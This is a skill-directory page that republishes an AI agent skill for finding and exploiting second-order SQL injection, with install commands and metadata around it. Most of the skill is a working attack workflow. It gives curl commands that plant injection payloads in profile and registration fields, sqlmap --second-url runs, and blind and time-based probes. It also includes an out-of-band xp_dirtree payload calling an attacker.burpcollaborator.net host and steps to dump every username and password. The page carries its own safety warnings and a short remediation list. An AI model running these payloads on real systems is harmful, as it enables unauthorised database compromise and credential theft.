Agent skill

Performing Second Order SQL Injection

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation.

Apache-2.0Auto-check: warningsSecurity

Install Performing Second Order SQL Injection

The automated check flagged lines worth reading first. See the safety section below.

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-second-order-sql-injection -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills performing-second-order-sql-injection --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/performing-second-order-sql-injection .claude/skills/performing-second-order-sql-injection && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
performing-second-order-sql-injection
GitHub stars
34k
Token cost
~2.3k tokens
SKILL.md length
414 words
Files
4 (incl. scripts, references)
Skills in repo
639
Repo updated
First seen
Licence
Apache-2.0

At a glance

Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation.

  • Works in 6 steps: Identify Storage and Trigger Points → Inject Payloads via Storage Points → Trigger Execution of Stored Payloads → …
  • Tasks that involve Web application vulnerabilities
  • SKILL.md covers When to Use, Prerequisites, Workflow and Key Concepts, plus 3 more sections
  • Runs Python scripts from its folder; calls curl; needs AUTH_TOKEN and ADMIN_TOKEN

What it does

Performing Second Order SQL Injection is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation.

Its SKILL.md is about 2.3k tokens, which your agent loads only when the skill is triggered. The skill folder holds 5 other files, including scripts and reference files (for example `references/api-reference.md` and `scripts/agent.py`).

It sits in Security, covering Web application vulnerabilities and SQL. It works with SQL. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Tasks that involve Web application vulnerabilities
  • Tasks that involve SQL

Example prompts

  • “/performing-second-order-sql-injection”

Requirements

  • Python 3
  • A credential in AUTH_TOKEN
  • A credential in ADMIN_TOKEN

Workflow steps

6 steps, taken from the step headings in SKILL.md.

  1. Identify Storage and Trigger Points
  2. Inject Payloads via Storage Points
  3. Trigger Execution of Stored Payloads
  4. Use SQLMap for Second-Order Injection
  5. Blind Second-Order Extraction
  6. Escalate to Full Database Compromise

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    Shell commands in SKILL.md call:

    • curl

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md. Its commands use curl, which can reach the network depending on how they are called.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names these keys or tokens, usually read from environment variables:

    • AUTH_TOKEN
    • ADMIN_TOKEN

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Performing Second Order SQL Injection loads about 2.3k tokens when it runs, and up to ~3k if it reads all its reference files. Until then it costs about 57 tokens; SKILL.md has 414 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~57
When it runs · the whole SKILL.md, loaded when a task matches
~2.3k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~3k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: warnings

The automated check found patterns that need a careful read before installing.

  • WarningMentions a paste, webhook or tunnelling service often used to send data outSKILL.md:156
    ore: test'; EXEC xp_dirtree '\\attacker.burpcollaborator.net\share'--
  • WarningMentions a paste, webhook or tunnelling service often used to send data outSKILL.md:159
    ; EXEC master..xp_dirtree '\\\\attacker.burpcollaborator.net\\share'--"

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 414 words, ~2,277 tokens.

Download SKILL.mdSave it as .claude/skills/performing-second-order-sql-injection/SKILL.md (or your agent's skills folder). This skill also uses 3 other files; get the full folder from GitHub.
name
performing-second-order-sql-injection
description
Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation.
domain
cybersecurity
subdomain
web-application-security
tags
second-order-sqli, stored-sql-injection, sql-injection, database-security, web-security, blind-injection, persistent-sqli
version
1.0
author
mahipal
license
Apache-2.0
nist_csf
PR.PS-01, ID.RA-01, PR.DS-10, DE.CM-01
mitre_attack
T1190, T1059.007, T1505.003, T1083, T1055

Performing Second-Order SQL Injection

When to Use

  • When first-order SQL injection testing reveals proper input sanitization at storage time
  • During penetration testing of applications with user-generated content stored in databases
  • When testing multi-step workflows where stored data feeds subsequent database queries
  • During assessment of admin panels that display or process user-submitted data
  • When evaluating stored procedure execution paths that use previously stored data

Prerequisites

  • Burp Suite Professional for request tracking across application flows
  • SQLMap with second-order injection support (--second-url flag)
  • Understanding of SQL injection fundamentals and blind extraction techniques
  • Two or more application functions (one for storing data, another for triggering execution)
  • Database error message monitoring or blind technique knowledge
  • Multiple user accounts for testing stored data across different contexts

Workflow

Step 1 — Identify Storage and Trigger Points
bash
# Map the application to identify:
# 1. STORAGE POINTS: Where user input is saved to database
#    - User registration (username, email, address)
#    - Profile update forms
#    - Comment/review submission
#    - File upload metadata
#    - Order/booking details

# 2. TRIGGER POINTS: Where stored data is used in queries
#    - Admin panels displaying user data
#    - Report generation
#    - Search functionality using stored preferences
#    - Password reset using stored email
#    - Export/download features

# Register a user with SQL injection in the username
curl -X POST http://target.com/register \
  -d "username=admin'--&password=test123&email=test@test.com"
Step 2 — Inject Payloads via Storage Points
bash
# Store SQL injection payload in username during registration
curl -X POST http://target.com/register \
  -d "username=test' OR '1'='1'--&password=Test1234&email=test@test.com"

# Store injection in profile fields
curl -X POST http://target.com/api/profile \
  -H "Cookie: session=AUTH_TOKEN" \
  -d "display_name=test' UNION SELECT password FROM users WHERE username='admin'--"

# Store injection in address field
curl -X POST http://target.com/api/address \
  -H "Cookie: session=AUTH_TOKEN" \
  -d "address=123 Main St' OR 1=1--&city=Test&zip=12345"

# Store injection in comment/review
curl -X POST http://target.com/api/review \
  -H "Cookie: session=AUTH_TOKEN" \
  -d "product_id=1&review=Great product' UNION SELECT table_name FROM information_schema.tables--"
Step 3 — Trigger Execution of Stored Payloads
bash
# Trigger via password change (uses stored username)
curl -X POST http://target.com/change-password \
  -H "Cookie: session=AUTH_TOKEN" \
  -d "old_password=Test1234&new_password=NewPass123"

# Trigger via admin user listing
curl -H "Cookie: session=ADMIN_TOKEN" http://target.com/admin/users

# Trigger via data export
curl -H "Cookie: session=AUTH_TOKEN" http://target.com/api/export-data

# Trigger via search using stored preferences
curl -H "Cookie: session=AUTH_TOKEN" http://target.com/api/recommendations

# Trigger via report generation
curl -H "Cookie: session=ADMIN_TOKEN" "http://target.com/admin/reports?type=user-activity"
Step 4 — Use SQLMap for Second-Order Injection
bash
# SQLMap with --second-url for second-order injection
# Store payload at registration, trigger at profile page
sqlmap -u "http://target.com/register" \
  --data="username=*&password=test&email=test@test.com" \
  --second-url="http://target.com/profile" \
  --cookie="session=AUTH_TOKEN" \
  --batch --dbs

# Use --second-req for complex trigger requests
sqlmap -u "http://target.com/api/update-profile" \
  --data="display_name=*" \
  --second-req=trigger_request.txt \
  --cookie="session=AUTH_TOKEN" \
  --batch --tables

# Content of trigger_request.txt:
# GET /admin/users HTTP/1.1
# Host: target.com
# Cookie: session=ADMIN_TOKEN
Step 5 — Blind Second-Order Extraction
bash
# Boolean-based blind: Check if stored payload causes different behavior
# Store: test' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--
curl -X POST http://target.com/api/profile \
  -H "Cookie: session=AUTH_TOKEN" \
  -d "display_name=test' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--"

# Trigger and observe response difference
curl -H "Cookie: session=AUTH_TOKEN" http://target.com/profile

# Time-based blind second-order
# Store: test'; WAITFOR DELAY '0:0:5'--
curl -X POST http://target.com/api/profile \
  -H "Cookie: session=AUTH_TOKEN" \
  -d "display_name=test'; WAITFOR DELAY '0:0:5'--"

# Out-of-band extraction via DNS
# Store: test'; EXEC xp_dirtree '\\attacker.burpcollaborator.net\share'--
curl -X POST http://target.com/api/profile \
  -H "Cookie: session=AUTH_TOKEN" \
  -d "display_name=test'; EXEC master..xp_dirtree '\\\\attacker.burpcollaborator.net\\share'--"
Step 6 — Escalate to Full Database Compromise
bash
# Once injection is confirmed, enumerate database
# Store UNION-based payload
curl -X POST http://target.com/api/profile \
  -d "display_name=test' UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--"

# Extract credentials
curl -X POST http://target.com/api/profile \
  -d "display_name=test' UNION SELECT GROUP_CONCAT(username,0x3a,password) FROM users--"

# Trigger execution and read results
curl http://target.com/profile

Key Concepts

ConceptDescription
Second-Order InjectionSQL payload stored safely, then executed unsafely in a later operation
Storage PointApplication function where malicious input is saved to the database
Trigger PointSeparate function that retrieves stored data and uses it in an unsafe query
Trusted Data AssumptionDeveloper assumes database-stored data is safe, skipping parameterization
Stored Procedure ChainsInjection through stored procedures that use previously saved user data
Deferred ExecutionPayload may not execute until hours or days after initial storage
Cross-Context InjectionData stored by one user triggers execution in another user's context
Show full SKILL.md (159 more words)Show less

Tools & Systems

ToolPurpose
SQLMapAutomated SQL injection with --second-url support for second-order attacks
Burp SuiteRequest tracking and comparison across storage and trigger endpoints
OWASP ZAPAutomated scanning with injection detection
CommixAutomated command injection tool supporting second-order techniques
Custom Python scriptsBuilding automated storage-and-trigger exploitation chains
DBeaver/DataGripDirect database access for verifying stored payloads

Common Scenarios

  1. Username-Based Attack — Register with a SQL injection payload as username; the payload executes when an admin views the user list
  2. Password Change Exploitation — Store injection in username; when changing password, the application uses the stored username in an unsafe UPDATE query
  3. Report Generation Attack — Inject payload in stored data fields; triggering report generation uses stored data in aggregate queries
  4. Cross-User Injection — Inject payload in a shared data field (comments, reviews) that triggers when another user or admin processes the data
  5. Export Function Exploit — Inject payload in profile data that triggers during CSV/PDF export operations

Output Format

## Second-Order SQL Injection Report
- **Target**: http://target.com
- **Storage Point**: POST /register (username field)
- **Trigger Point**: GET /admin/users (admin panel)
- **Database**: MySQL 8.0

### Attack Flow
1. Registered user with username: `admin' UNION SELECT password FROM users--`
2. Application stored username safely using parameterized INSERT
3. Admin panel retrieves usernames with unsafe string concatenation in SELECT
4. Injected SQL executes, revealing all user passwords in admin view

### Data Extracted
| Table | Columns | Records |
|-------|---------|---------|
| users | username, password, email | 150 |
| admin_tokens | token, user_id | 3 |

### Remediation
- Use parameterized queries for ALL database operations, including reads
- Never trust data retrieved from the database as safe
- Implement output encoding when displaying database content
- Apply least-privilege database permissions
- Enable SQL query logging for detecting injection attempts

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 3 other files (scripts, references) in skills/performing-second-order-sql-injection of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Performing Second Order SQL Injection next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Performing Second Order SQL Injection compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Performing Second Order SQL Injection this skillmukul975/Anthropic-Cybersecurity-Skills34k—~2.3kAutomated safety check: WarnApache-2.0
Secknowledge SkillPa55w0rd/secknowledge-skill423—~2.7kAutomated safety check: PassNone
Code Security AuditProgrammerAnthony/Expert-Coding-Harness235—~1.6kAutomated safety check: PassMIT
Php Codeigniter Audit0xShe/PHP-Code-Audit-Skill4021 repos~477Automated safety check: PassNone
TS Reviewliuyanghejerry/Clausura204—~166Automated safety check: PassMIT
WebMuWinds/BUUCTF_Agent267—~463Automated safety check: PassApache-2.0

Similar skills

  • Secknowledge Skill

    Pa55w0rd/secknowledge-skill

    Web+AI 安全测试知识库。融合 WooYun 88,636 案例 + 先知 L1-L4 方法论 + GAARM 173 风险 + OWASP Top 10 (LLM/ASI/WSTG)。

    423 GitHub stars~2.7k tokensUpdated 3 mo ago
    SecurityAuto-check passed
  • Code Security Audit

    ProgrammerAnthony/Expert-Coding-Harness

    A skill your agent uses when 用户需要对代码进行安全审计、发现安全漏洞、上线前安全评估、检查代码是否存在安全风险时。触发场景:代码安全审计、安全审计、白盒审计、安全扫描、漏洞检测、漏洞挖掘、SQL注入、命令注入、XSS、SSRF、反序列化、认证绕过、越权、代码安全检查、security audit、code…

    235 GitHub stars~1.6k tokensUpdated 4 mo ago
    SecurityAuto-check passed
  • Php Codeigniter Audit

    0xShe/PHP-Code-Audit-Skill

    CodeIgniter 框架特效安全审计工具。针对 CodeIgniter 的 CSRF、XSS 输出过滤、数据库查询构造、路由与验证器配置、会话 Cookie 安全等机制进行白盒静态审计,并映射到通用漏洞类型体系(CSRF/AUTH/XSS/SQL/CFG/SESS 等)。

    402 GitHub starsUsed in 1 repo~477 tokens
    SecurityAuto-check passed
  • TS Review

    liuyanghejerry/Clausura

    TypeScript monorepo 审查:XSS、SQL 注入、密钥、any、console.log. An agent skill from liuyanghejerry/Clausura.

    204 GitHub stars~166 tokensUpdated 8 days ago
    SecurityAuto-check passed
  • Web

    MuWinds/BUUCTF_Agent

    Web 安全攻防技术,包括 SQL 注入、XSS、文件上传、命令注入、SSRF、反序列化等常见漏洞的识别与利用. An agent skill from MuWinds/BUUCTF_Agent.

    267 GitHub stars~463 tokensUpdated 1 mo ago
    SecurityAuto-check passed
  • Web Sqli

    s0ld13rr/pentestcode

    SQL injection detection→exploitation→proof for web apps and APIs.

    817 GitHub stars~710 tokensUpdated 5 days ago
    SecurityAuto-check passed

More from mukul975/Anthropic-Cybersecurity-Skills

All 639 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Works with

Categories

Questions about Performing Second Order SQL Injection

What does Performing Second Order SQL Injection do?

Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation. Performing Second Order SQL Injection is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation.

When should I use Performing Second Order SQL Injection?

Performing Second Order SQL Injection fits situations like: tasks that involve Web application vulnerabilities; tasks that involve SQL.

How do I install Performing Second Order SQL Injection in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-second-order-sql-injection -a claude-code`. Or copy the skill folder (skills/performing-second-order-sql-injection in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/performing-second-order-sql-injection in your project. Claude Code loads it when a task matches its description.

How do I install Performing Second Order SQL Injection in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-second-order-sql-injection -a codex`. Or copy the skill folder (skills/performing-second-order-sql-injection in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/performing-second-order-sql-injection in your project. Codex loads it when a task matches its description.

Can I use Performing Second Order SQL Injection in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-second-order-sql-injection -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/performing-second-order-sql-injection, .gemini/skills/performing-second-order-sql-injection, .github/skills/performing-second-order-sql-injection and .opencode/skills/performing-second-order-sql-injection in your project.

What does Performing Second Order SQL Injection need to run?

Going by SKILL.md and its folder, Performing Second Order SQL Injection needs Python for the scripts in its folder, the command-line tools its instructions call (curl) and credentials named AUTH_TOKEN and ADMIN_TOKEN. Our summary lists: Python 3; A credential in AUTH_TOKEN; A credential in ADMIN_TOKEN.

Does Performing Second Order SQL Injection access the network?

SKILL.md contains no URLs. Its commands use curl, which can reach the network depending on how they are called. This is read from the text; nothing was executed.

Is Performing Second Order SQL Injection safe to install?

Our automated static check of SKILL.md flagged 2 warning(s): mentions a paste, webhook or tunnelling service often used to send data out. Read the flagged lines before installing; the check is not a guarantee either way. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Performing Second Order SQL Injection use?

Performing Second Order SQL Injection is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Performing Second Order SQL Injection use?

About 2.3k tokens (SKILL.md is roughly 9.1k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 678 tokens, read only when the agent opens those files.

What are the alternatives to Performing Second Order SQL Injection?

Skills that share tags, products or a category with Performing Second Order SQL Injection: Secknowledge Skill (Pa55w0rd/secknowledge-skill, 423 stars), Code Security Audit (ProgrammerAnthony/Expert-Coding-Harness, 235 stars), Php Codeigniter Audit (0xShe/PHP-Code-Audit-Skill, 402 stars) and TS Review (liuyanghejerry/Clausura, 204 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Performing Second Order SQL Injection?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 33,870 GitHub stars. The repository holds 639 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.